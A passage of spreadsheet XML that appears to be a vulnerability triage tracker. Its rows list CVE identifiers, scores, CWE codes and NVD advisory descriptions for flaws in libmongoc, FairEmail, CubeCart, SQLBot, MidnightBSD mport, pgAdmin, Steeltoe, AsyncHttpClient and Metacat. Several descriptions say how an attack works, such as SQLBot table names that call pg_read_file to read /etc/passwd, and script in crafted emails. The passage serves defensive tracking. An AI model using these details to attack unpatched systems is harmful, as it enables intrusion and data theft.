      <c r="K282" s="5" t="inlineStr"/>
      <c r="L282" s="5" t="inlineStr"/>
      <c r="M282" s="5" t="inlineStr"/>
      <c r="N282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O282" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P282" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q282" s="5" t="inlineStr"/>
      <c r="R282" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="S282" s="5" t="inlineStr">
        <is>
          <t>A flaw in libmongoc's SCRAM authentication implementation caused the client to continue the authentication handshake and transmit the client proof even when a nonce mismatch was detected in the server's first message. An unauthorized party with a man-in-the-middle position could exploit this by injecting a crafted server-first-message containing a controlled salt and low iteration count, then capturing the resulting client proof to perform offline password cracking. This vulnerability is mitigated by TLS, which is standard in production deployments.</t>
        </is>
      </c>
      <c r="T282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93394</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54521</t>
        </is>
      </c>
      <c r="D283" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E283" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F283" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="inlineStr"/>
      <c r="I283" s="5" t="inlineStr"/>
      <c r="J283" s="5" t="inlineStr"/>
      <c r="K283" s="5" t="inlineStr"/>
      <c r="L283" s="5" t="inlineStr"/>
      <c r="M283" s="5" t="inlineStr"/>
      <c r="N283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O283" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P283" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q283" s="5" t="inlineStr"/>
      <c r="R283" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S283" s="5" t="inlineStr">
        <is>
          <t>FairEmail is a fully featured, open source, privacy-friendly email app for Android. Prior to 1.2319, the ActivityAMP AMP message renderer in app/src/main/java/eu/faircode/email/ActivityAMP.java enables JavaScript in its WebView but incompletely sanitizes untrusted message HTML. For non-allowlisted hosts, script.removeAttr("src") leaves inline script elements in the document and does not reject event-handler attributes or javascript: URLs on other elements. A crafted AMP email can execute arbitrary JavaScript when a recipient opens the message and enables the AMP toggle. The script can read the message DOM, exfiltrate message data, and display phishing overlays within the message-body area. Exploitation requires the recipient to enable the AMP toggle, and practical exposure is reduced because AMP email is uncommon. This issue is fixed in version 1.2319.</t>
        </is>
      </c>
      <c r="T283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54521</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54644</t>
        </is>
      </c>
      <c r="D284" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E284" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F284" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="inlineStr"/>
      <c r="I284" s="5" t="inlineStr"/>
      <c r="J284" s="5" t="inlineStr"/>
      <c r="K284" s="5" t="inlineStr"/>
      <c r="L284" s="5" t="inlineStr"/>
      <c r="M284" s="5" t="inlineStr"/>
      <c r="N284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O284" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P284" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q284" s="5" t="inlineStr"/>
      <c r="R284" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S284" s="5" t="inlineStr">
        <is>
          <t>CubeCart is an ecommerce software solution. Prior to 6.7.5, the _errorMessage method in classes/gui.class.php uses strip_tags to permit anchor elements in error, information, and warning messages while retaining unsafe href values and onclick event handlers. Attacker-controlled search or input data that reaches a GUI message can carry a javascript: URI or event handler through the filter, and viewing or interacting with the rendered anchor executes JavaScript in the victim's browser session, enabling session exposure or unauthorized application actions. This issue is fixed in version 6.7.5.</t>
        </is>
      </c>
      <c r="T284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54644</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55946</t>
        </is>
      </c>
      <c r="D285" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E285" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="inlineStr"/>
      <c r="I285" s="5" t="inlineStr"/>
      <c r="J285" s="5" t="inlineStr"/>
      <c r="K285" s="5" t="inlineStr"/>
      <c r="L285" s="5" t="inlineStr"/>
      <c r="M285" s="5" t="inlineStr"/>
      <c r="N285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O285" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P285" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q285" s="5" t="inlineStr"/>
      <c r="R285" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="S285" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command ('command injection') in Microsoft Copilot allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55946</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53556</t>
        </is>
      </c>
      <c r="D286" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E286" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F286" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="inlineStr"/>
      <c r="I286" s="5" t="inlineStr"/>
      <c r="J286" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K286" s="5" t="inlineStr"/>
      <c r="L286" s="5" t="inlineStr"/>
      <c r="M286" s="5" t="inlineStr"/>
      <c r="N286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O286" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P286" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q286" s="5" t="inlineStr"/>
      <c r="R286" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S286" s="5" t="inlineStr">
        <is>
          <t>SQLBot is an intelligent Text-to-SQL system based on large language models and RAG. Prior to 1.9.0, the POST /api/v1/datasource/previewData endpoint in backend/apps/datasource/crud/datasource.py incorporates the client-controlled table_name value into generated SQL without safe identifier handling. An authenticated user can configure a datasource for SQLBot's internal PostgreSQL service and submit a crafted table_name that remains a SELECT operation under the read-only policy while invoking pg_read_file(), pg_read_binary_file(), or pg_ls_dir(). In the default tested trusted loopback authentication configuration, the internal connection accepts invalid credentials and executes with PostgreSQL superuser privileges, allowing filesystem content such as /etc/hosts and /etc/passwd to be returned in the previewData API response and potentially exposing configuration, credentials, authentication secrets, and source code. This issue is fixed in version 1.9.0.</t>
        </is>
      </c>
      <c r="T286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53556</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54582</t>
        </is>
      </c>
      <c r="D287" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E287" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F287" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="inlineStr"/>
      <c r="I287" s="5" t="inlineStr"/>
      <c r="J287" s="5" t="inlineStr"/>
      <c r="K287" s="5" t="inlineStr"/>
      <c r="L287" s="5" t="inlineStr"/>
      <c r="M287" s="5" t="inlineStr"/>
      <c r="N287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O287" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P287" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q287" s="5" t="inlineStr"/>
      <c r="R287" s="5" t="inlineStr">
        <is>
          <t>CWE-668, CWE-73</t>
        </is>
      </c>
      <c r="S287" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, package installation lacked a preflight check for incoming non-directory assets that already existed on disk. The affected logic across libmport/check_preconditions.c, libmport/install_primative.c, and libmport/mport_private.h did not apply MPORT_PRECHECK_FILE_CONFLICTS, so a crafted or conflicting package could overwrite a file owned by another package or unmanaged by mport. The check is bypassed only when the operator explicitly enables mport-&gt;force. Privileged installation without that override could compromise local filesystem integrity and package database consistency. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54582</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54585</t>
        </is>
      </c>
      <c r="D288" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E288" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F288" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="inlineStr"/>
      <c r="I288" s="5" t="inlineStr"/>
      <c r="J288" s="5" t="inlineStr"/>
      <c r="K288" s="5" t="inlineStr"/>
      <c r="L288" s="5" t="inlineStr"/>
      <c r="M288" s="5" t="inlineStr"/>
      <c r="N288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O288" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P288" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q288" s="5" t="inlineStr"/>
      <c r="R288" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S288" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, create_sample_file() in libmport/bundle_read_install_pkg.c did not constrain absolute source and destination paths from the sample-file manifest directive to mport-&gt;root. A malicious or malformed package manifest could therefore direct privileged sample-file handling to copy or write outside the configured installation root, compromising local filesystem integrity. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54585</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54586</t>
        </is>
      </c>
      <c r="D289" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E289" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F289" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="inlineStr"/>
      <c r="I289" s="5" t="inlineStr"/>
      <c r="J289" s="5" t="inlineStr"/>
      <c r="K289" s="5" t="inlineStr"/>
      <c r="L289" s="5" t="inlineStr"/>
      <c r="M289" s="5" t="inlineStr"/>
      <c r="N289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O289" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P289" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q289" s="5" t="inlineStr"/>
      <c r="R289" s="5" t="inlineStr">
        <is>
          <t>CWE-319, CWE-345</t>
        </is>
      </c>
      <c r="S289" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, the mport_fetch_index(), mport_fetch_bootstrap_index(), and mport_fetch_bundle() paths in libmport/fetch.c accepted non-HTTPS repository and package mirror URLs without a url_is_https() enforcement check. When a cleartext URL was configured or returned by mirror data, a network-positioned attacker could tamper with package index or package download traffic and compromise package selection or integrity. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54586</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86861</t>
        </is>
      </c>
      <c r="D290" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E290" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F290" s="5" t="inlineStr">
        <is>
          <t>f86ef6dc-4d3a-42ad-8f28-e6d5547a5007</t>
        </is>
      </c>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="inlineStr"/>
      <c r="I290" s="5" t="inlineStr"/>
      <c r="J290" s="5" t="inlineStr"/>
      <c r="K290" s="5" t="inlineStr"/>
      <c r="L290" s="5" t="inlineStr"/>
      <c r="M290" s="5" t="inlineStr"/>
      <c r="N290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O290" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P290" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q290" s="5" t="inlineStr"/>
      <c r="R290" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-59</t>
        </is>
      </c>
      <c r="S290" s="5" t="inlineStr">
        <is>
          <t>pgAdmin 4's File Manager save_file endpoint, which backs saving from the Query Tool and ERD, validated the requested path with Filemanager.check_access_permission() and then opened the file for writing with a plain open() call. CVE-2026-7819 had previously hardened the separate file upload path by opening its target with O_NOFOLLOW, so that the kernel refuses to follow a symbolic link at the final path component, but save_file was left on an unprotected open(). A symbolic link already present when the check ran was rejected by the check itself; the remaining exposure was a link substituted at the final path component in the interval between the check and the write, at which point the write followed the link and landed outside the user's storage directory, creating or overwriting an arbitrary file as the operating-system account running pgAdmin.
Exploitation requires the ability to create or replace a symbolic link inside the requesting user's storage directory. pgAdmin exposes no interface that creates symbolic links, so this requires filesystem access to the pgAdmin host or to a shared or network-mounted storage backend, together with winning the timing window. The reporter did not achieve a write against a released version, having attempted approximately 63,000 racing requests without success; the reported defect is the uncovered write path rather than a demonstrated sandbox escape.
The fix routes save_file's write through the same O_NOFOLLOW-protected helper already used by the upload path, so both File Manager write sinks carry identical kernel-enforced protection, and reports a symbolic-link refusal explicitly instead of surfacing the underlying system error text. Note that files created by save_file are now given mode 0600, inheriting the behaviour introduced for uploads. The protection covers the final path component; substitution of an intermediate directory component is not addressed by this change.
This issue affects pgAdmin 4: from the introduction of the containment check in the File Manager save path before 9.18.</t>
        </is>
      </c>
      <c r="T290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86861</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75523</t>
        </is>
      </c>
      <c r="D291" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E291" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F291" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="inlineStr"/>
      <c r="I291" s="5" t="inlineStr"/>
      <c r="J291" s="5" t="inlineStr"/>
      <c r="K291" s="5" t="inlineStr"/>
      <c r="L291" s="5" t="inlineStr">
        <is>
          <t>nuget:Steeltoe.Management.Endpoint</t>
        </is>
      </c>
      <c r="M291" s="5" t="inlineStr">
        <is>
          <t>4.3.0</t>
        </is>
      </c>
      <c r="N291" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O291" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P291" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q291" s="5" t="inlineStr"/>
      <c r="R291" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S291" s="5" t="inlineStr">
        <is>
          <t>Steeltoe is an open source project that provides a collection of libraries that helps users build cloud-native applications. Prior to 4.3.0, the Steeltoe.Management.Endpoint /actuator/httpexchanges endpoint passes recorded request URIs through MaskedUri, which masks URI user information but does not inspect query strings. When Management:Endpoints:HttpExchanges:IncludeQueryString is enabled, the HttpExchangeRequest response can disclose OAuth tokens, password-reset tokens, signed-URL signatures, API keys, and other query-string secrets from prior traffic to a caller that can reach the explicitly exposed endpoint. The Steeltoe.Management.Endpoint.Actuators.HttpExchanges DEBUG logger also records these URIs, creating a second disclosure channel for users with log access. This issue is fixed in version 4.3.0.</t>
        </is>
      </c>
      <c r="T291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75523</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85718</t>
        </is>
      </c>
      <c r="D292" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E292" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F292" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="inlineStr"/>
      <c r="I292" s="5" t="inlineStr"/>
      <c r="J292" s="5" t="inlineStr"/>
      <c r="K292" s="5" t="inlineStr"/>
      <c r="L292" s="5" t="inlineStr"/>
      <c r="M292" s="5" t="inlineStr"/>
      <c r="N292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O292" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P292" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q292" s="5" t="inlineStr"/>
      <c r="R292" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-772</t>
        </is>
      </c>
      <c r="S292" s="5" t="inlineStr">
        <is>
          <t>The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 3.0.8 until 3.0.12, a client with maxConnections or maxConnectionsPerHost set above zero leaks one connection permit whenever TLS connection establishment fails before the handshake completes. NettyConnectListener removes the partitionKeyLock permit from NettyResponseFuture before every failure path is bound to the channel closeFuture, so an abort can leave the permit unreleased. Repeated failures can permanently lock out one host under a per-host limit or drain the shared pool under a global limit, blocking later requests even when no connection remains open. The default unlimited connection setting is not affected. This issue is fixed in version 3.0.12.</t>
        </is>
      </c>
      <c r="T292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85718</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85720</t>
        </is>
      </c>
      <c r="D293" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E293" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F293" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="inlineStr"/>
      <c r="I293" s="5" t="inlineStr"/>
      <c r="J293" s="5" t="inlineStr"/>
      <c r="K293" s="5" t="inlineStr"/>
      <c r="L293" s="5" t="inlineStr">
        <is>
          <t>maven:org.asynchttpclient:async-http-client</t>
        </is>
      </c>
      <c r="M293" s="5" t="inlineStr">
        <is>
          <t>2.16.1, 3.0.12</t>
        </is>
      </c>
      <c r="N293" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O293" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P293" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q293" s="5" t="inlineStr"/>
      <c r="R293" s="5" t="inlineStr">
        <is>
          <t>CWE-319, CWE-522</t>
        </is>
      </c>
      <c r="S293" s="5" t="inlineStr">
        <is>
          <t>The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 2.0.0 until 2.16.1 and 3.0.12, a request using an HTTP proxy to reach an HTTPS origin can expose preemptive origin credentials because NettyRequestFactory and NettyRequestSender.sendRequestWithNewChannel attach Authorization to the plaintext CONNECT request before the TLS tunnel exists. Basic or Digest credentials and per-connection NTLM, Kerberos, or SPNEGO tokens intended for the origin are therefore visible to the proxy and to observers on the client-to-proxy hop. The tunneled request still receives origin Authorization after the tunnel is established, while Proxy-Authorization remains on CONNECT for its intended proxy recipient. This issue is fixed in versions 2.16.1 and 3.0.12.</t>
        </is>
      </c>
      <c r="T293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85720</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50022</t>
        </is>
      </c>
      <c r="D294" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E294" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F294" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="inlineStr"/>
      <c r="I294" s="5" t="inlineStr"/>
      <c r="J294" s="5" t="inlineStr"/>
      <c r="K294" s="5" t="inlineStr"/>
      <c r="L294" s="5" t="inlineStr"/>
      <c r="M294" s="5" t="inlineStr"/>
      <c r="N294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O294" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P294" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q294" s="5" t="inlineStr"/>
      <c r="R294" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S294" s="5" t="inlineStr">
        <is>
          <t>Metacat is data repository software that helps researchers preserve, share, and discover data. Prior to 3.4.2, MetacatSolrIndex.query forwards the client-controlled qt parameter through Apache SolrJ from search endpoints such as /d1/mn/v2/query/solr/ to its privileged Solr backend. An unauthenticated client can select the /admin/file handler, and SolrJ reformats the parameter into a request accepted even when handleSelect=false is configured on Solr 7.0 or later. When Solr returns the selected core configuration file, Metacat embeds the raw content in an XML processing error response, disclosing internal files such as solrconfig.xml and enabling infrastructure profiling. This issue is fixed in version 3.4.2.</t>
        </is>
      </c>
      <c r="T294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50022</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54575</t>
        </is>
      </c>
      <c r="D295" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E295" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F295" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G295" s="5" t="inlineStr"/>
      <c r="H295" s="5" t="inlineStr"/>
      <c r="I295" s="5" t="inlineStr"/>
      <c r="J295" s="5" t="inlineStr"/>
      <c r="K295" s="5" t="inlineStr"/>
      <c r="L295" s="5" t="inlineStr"/>
      <c r="M295" s="5" t="inlineStr"/>
      <c r="N295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O295" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P295" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q295" s="5" t="inlineStr"/>
      <c r="R295" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-78</t>
        </is>
      </c>
      <c r="S295" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, privileged package fetch and cache-cleaning operations used race-prone path handling across libmport/fetch.c, libmport/clean.c, libmport/util.c, libmport/bundle_read_install_pkg.c, libmport/delete_primative.c, and libexec/mport.create/mport.create.c. A local attacker with write access to a participating package cache or staging path could race path checks and replacement operations to redirect package downloads, cleanup, or install-related side effects outside the intended cache. The affected lifecycle helper paths also used shell-form invocation, increasing command-line interpretation risk during privileged helper execution. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54575</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54576</t>
        </is>
      </c>
      <c r="D296" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E296" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F296" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="inlineStr"/>
      <c r="I296" s="5" t="inlineStr"/>
      <c r="J296" s="5" t="inlineStr"/>
